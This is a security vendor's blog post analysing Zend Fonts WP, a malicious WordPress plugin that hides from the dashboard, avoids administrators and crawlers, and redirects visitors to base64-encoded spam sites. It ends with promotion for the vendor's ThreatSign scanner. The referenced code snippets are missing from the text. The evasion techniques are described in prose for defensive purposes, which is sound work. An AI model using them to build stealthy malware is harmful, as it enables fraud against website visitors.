We've discussed malicious HTTP redirection in generic terms before. A malicious traffic redirect can happen through compromised, or plain fraudulent code the website owners and administrators unknowingly install on their websites. A common way for this to happen is through third-party plugins for content management systems like WordPress. Plugins promise to bring some great new functionality to a website that will benefit the site owner or its visitors somehow. Eager for the enhancement, the site owner installs the plugin, unaware that they've also installed sinister code or malware that lurks in the background. Such is the case with the plugin we'll be discussing, Zend Fonts WP.

This malware masquerading as a legitimate WordPress plugin performs some tricks that are fairly common for malicious code. The first step is for the shady code to present itself as legitimate. They do this by creating a header in their source files that looks identical to what a legitimate plugin might contain. This includes the name of the plugin, a URI for more information, the name of the author, and more. Of course, this information is all fake. The developers of these harmful bits of code are clever and wouldn't put any identifying information in them. But the presence of the information gives the illusion that the malware-laden plugin is just as legitimate as any other.

The WordPress user dashboard gives account owners the ability to add, view, and remove any plugins that have been installed on their account. This is, of course, a necessary part of account administration. But it's not very convenient for a bad actor if you can simply remove their malware and go about your day. To get around this, Zend Fonts WP uses a filter and a hook to unset itself. This means that when account users open their dashboard to view the plugins they have installed, they won't see Zend Fonts WP. Administrators can't remove the plugin without the ability to see it and without the technical know-how to manage the PHP files directly.

The following code snippet presents a plugin's callback function invoked by WordPress when website administrator tries to list all installed plugins:

If a site administrator were to go to their web address and find themselves redirected to some scam-bait website instead, the game would be up for the malware. So, in addition to hiding itself from the administrator's view on the WordPress dashboard, Zend Fonts WP goes further and ensures that the user visiting the site isn't logged in as an administrator. If they are, it remains inactive to keep its presence and functionality hidden for as long as possible.

This particular malware takes this common tactic a step further. It creates a database that stores information about a user when they log in as an administrator. Storing the user agent and IP address of administrators can do a better job at trying to avoid presenting itself to those users, even when they are logged in from a different computer.

This code manages the admin users and skips redirection:

It will also stay inactive if the visitor is a web crawler bot instead of a human. Web crawlers don't fall for scam websites, don't bring in advertising dollars, and may alert the site owners to the existence of a threat. Finally, once it's convinced the user is a valid mark, it waits until their second attempt at viewing a page before sending the redirect and sets a cookie so it doesn't happen frequently enough for the user to contact site administrators and report something wrong.

Finally, we get to the redirection part of the code.

Having a PHP file filled with plain text addresses to scammy sounding websites would also be a way to detect the threat more quickly. So, Zend Fonts WP encodes the URLs using base64. To anyone who doesn't know better, the URL information looks like random alphanumeric characters. Since it isn't uncommon to encode information this way, it is much less suspicious than exposed URLs would be.

The websites it redirects to run the gamut of spam sites. Some are filled to the brim with referral URLs that will attempt to make money from users. Others are links to fake surveys that promise rewards but really just want to extract information from the users. Once acquired, this information is certain to be used for further nefarious goals.

As you've seen, developers of malicious code are sneaky. They deploy many tricks to ensure that human eyes don't find their code and end their activity. Quttera's ThreatSign provides client websites with a pair of computer eyes and ears. It scans the entire site, looking for threats such as skimmers, malvertising, zero-day threats, and more. The multi-layered analysis in ThreatSign detects even well-hidden code. Once it is, the system issues a report pinpointing what it's found so your clients can take action to remove the offending code.

Threats to websites can come from the server-side, as we've seen today, and they can come from external sources. ThreatSign scans both locations. It keeps an eye on the PHP, Javascript, and HTML files that make a website run and detects any malicious modifications. External scanning monitors for communication between malware and command-and-control servers, catching any infections promptly so they can be removed. All of this functionality is wrapped in a convenient web-based dashboard that gives administrators a transparent view of their system's current status.

Malicious code can also lead to an infected site being blacklisted. When this happens, visibility in search engines plummets, taking site traffic with it. By monitoring for the blacklisting of a site, ThreatSign quickly gives an administrator a heads up when their site has been blacklisted, allowing them to take the necessary steps to get back in good standing.

ThreatSign comes in plans to suit businesses of every size and easily pays for itself by reducing downtime and the need for emergency action.